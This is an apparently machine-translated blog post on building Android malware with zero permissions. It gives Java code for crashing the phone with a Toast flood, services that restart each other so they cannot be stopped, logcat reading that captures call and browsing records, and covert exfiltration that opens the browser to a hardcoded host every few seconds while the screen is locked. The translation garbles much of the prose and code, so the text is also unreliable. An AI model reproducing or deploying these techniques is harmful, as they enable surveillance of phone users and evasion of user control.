One, 0 privileges to restart the phone:Now let's define a class that implements this functionality:
/**
* Click event
* @param view/public
void reboot (view view) {
Intent reboot = new Intent (intent.action_ REBOOT);
Reboot.putextra ("nowait", 1);
Reboot.putextra ("Interval", 1);
Reboot.putextra ("window", 0);
Sendbroadcast (reboot);
}
Program exception terminated, LOGCAT control output, said no permissions
We need to know what permissions are needed to reboot the phone.
The android:protectionlevel= "Signatureorsystem" indicates that it is only the system's program or the signature and system signature of the same program to achieve the function of restarting the phone. We're in the manifest file, plus the missing permissions.
<uses-permission android:name= "Android.permission.REBOOT"/>But the same error has occurred in the program. However, we can improve our programs into system privileges (the UID of our programs as well as the level of the system) only need to be configured like this:
android:shareduserid= "Android.uid.system"The following error was found after running:
[2012-02-12 22:51:26-android_safe_reboot] Installation error:install_failed_shared_user_incompatible [2012-02-12 22:51:26-android_safe_reboot] Please check Logcat output for more details. [2012-02-12 22:51:26-android_safe_reboot] Launch canceled!
Indicates that the installation failed because we use the
android:shareduserid= "Android.uid.system" but our program's signature is not the system's signature, and Eclipse defaults to debug signing.So now our program must be signed by the system, of course, can go to the website to download. Now what we're going to do is use the system's signature for the program, so what do we do? Platform.pk8,platform.x509.pem (Requires signature Packaging tool Signapk.jar,) The first step, we write the program in Eclipse, in the bin directory can be found. The second step, open the APK, put the inside Meta-inf (contains some of the default signed information) of the three files delete the third step, using Signapk.jar destined for signature packaging. E:\2\DOUBAN4\SIGNAPK (1) \signapk>java-jar Signapk.jar platform.x509.pem platfor m.pk8 android_safe_reboot.apk ( Original Pak) reboot.apk (new APK) then we installed the packaged apk to the emulator via the cmd command, and the following error occurred:
Because the simulator already has such a program, but his signature is a debug signature, we know that the only way to identify an application is the package name and the signature of only two programs and the package name, then the two applications are the same class of programs. If an application is to be updated, then the signature and package name must remain, otherwise the update will not succeed. What is the benefit of identifying a program with a package name and signature? If only the package name to identify, if someone knows the package name of your program, then others can also write an alternative program, but the same as your package name, the user as soon as the installation of your cover. To sum up, we need to uninstall this program on the emulator (ADB uninstall package name), then we install the signature package after the APK, start the program, click the button, and then the simulator will appear as follows because it is the simulator, it will stay in the interface, if it is true machine will not appear like this .
However, this is more troublesome. We can do it in the following way.
public void reboot (view view) {
//use Toast to reboot the phone
//System_server while
(true) {
Toast mytoast = new Toast ( this);
Mytoast.setview (The new View (this));
Mytoast.show ();
}
This code should be written to the service's child thread, so that the user's request is not blocked.
Two, Rogue software is how to create undead body.0 Permission program boot up, and then build the program on the basis of the undead body. We know that we don't need to configure any permissions for our programs to boot up, just write a broadcast. To enable the user to stop the program's services, we can use two service to start the second service in the OnDestroy () method of the first service to start the first service in the OnDestroy () method of the second service So that the service for the program cannot be stopped. Then on the radio, boot up a few services.
third, is our privacy really safe ?We can use the program to monitor what the user has opened the Web page, and who called the phone and other information. This needs to be logcat. Logcat is divided into 4 categories of log information: Main/dev/log/main This is the Logcat console output log information events/dev/log/events about the event log information Radio/dev/log /radio log System/dev/log/system related to network communication now assume you've configured the Android environment variable, ADB logcat-b radio then we call the simulator via DDMS (12121)
We can see the trace of the phone number, and the other user's behavior is the same. For example, we can go through events by browsing a webpage. Now we can record the Logcat log information. Then we can upload the data we want to the server. Write the logs we need through the service to the file.
Use the service to write the log we need to the file
. try {
process process = Runtime.getruntime (). EXEC ("Logcat-b Radio");
InputStream is = Process.getinputstream ();
BufferedReader br = new BufferedReader (new InputStreamReader (IS));
Data/data
File File = new file (Environment.getexternalstoragedirectory (), "Log.txt");
FileOutputStream fos = new FileOutputStream (file);
String result = null;
while (result = Br.readline ())!=null) {
System.out.println (result);
Fos.write (Result.getbytes ());
Fos.flush ();
}
catch (Exception e) {
e.printstacktrace ();
}
Four, 0 permissions to upload data to the server, 0 permissions to download data from the serverWe know that dealing with the Internet requires Internet access. We can simulate when the user lock the screen upload, when the user unlocked, that is, stop uploading.
public class Uploadservice extends Service {private screenoffbroadcastreciver sfreciver; private
Screenonbroadcastreciver Soreciver;
Private Keyguardmanager Keyguardmanager;
Handler Handler; @Override public void OnCreate () {super.oncreate ();//About keyboard Service Keyguardmanager = (Keyguardmanager) getsystemservice (
Keyguard_service);
Handler = new Handler ();
Soreciver = new Screenonbroadcastreciver ();
Sfreciver = new Screenoffbroadcastreciver ();
These two broadcast recipients are interested in broadcasting and registering the two broadcast recipients Intentfilter onintentfilter = new Intentfilter ("Android.intent.action.SCREEN_ON");
Registerreceiver (Soreciver, Onintentfilter);
Intentfilter offintentfilter = new Intentfilter ("Android.intent.action.SCREEN_OFF");
Registerreceiver (Sfreciver, Offintentfilter); @Override public IBinder onbind (Intent Intent) {<span style= ' white-space:pre ' > </span>return null;}//Screen lock The corresponding broadcast class Screenoffbroadcastreciver extends Broadcastreceiver {@Override public void onreceive (context, Intent Intent) {System.out.println ("screen lock");
500ms after the start of the upload data handler.postdelayed (r, 500); }//Screen to open the corresponding broadcast class Screenonbroadcastreciver extends Broadcastreceiver {@Override public void onreceive
, Intent Intent) {System.out.println ("screen open");
Cancel Data Upload handler.removecallbacks (R);
Simulate Home key Intent Intent2 = new Intent (intent.action_main);
Intent2.setflags (Intent.flag_activity_new_task);/Pay attention to intent2.addcategory (intent.category_home);
Context.startactivity (Intent2); } private Runnable R = new Runnable () {@Override public void run () {//If it is a lock-screen state if (Keyguardmanager.ink
Eyguardrestrictedinputmode ()) {//Get upload, content with you String hackinfo = "Http://192.168.1.247:8080/data.jsp?data="
+ New Random (). Nextfloat ();
Intent it = new Intent ();
It.setflags (Intent.flag_activity_new_task);
Uri uri = Uri.parse (hackinfo);
It.setaction (Intent.action_view);
It.setdata (URI);
StartActivity (IT); SYSTEM.OUT.PRINTLN ("submit data" + Hackinfo);
Every 5 seconds, perform an upload handler.postdelayed (r, 5000);
}
}
};
}But there is a problem, the browser does not start, if the user to start the browser, found that the browser has been started. 0, the right to upload data to the server, only need to go through the get way can be followed by parameters such as, Http://192.168.1.1:8080/dd.zip
to sign apk by command:
Into the JDK installation directory such as: C:\Program Files\java\jdk1.6.0_10\bin and then through the command to the unsigned apk signed.
Jarsigner-verbose-keystore Xxx.keystore-signedjar out.apk in.apk xxx.keystore
C:\Program files\java\jdk1.8.0_45\bin>jarsigner-verbose-keystore Xxx.keystore-signedjar out.apk in.apk whzf (whzf is alias)
If there is any shortage, please criticize the reader. Please indicate the origin of the reprint: http://blog.csdn.net/johnny901114/article/details/7536796
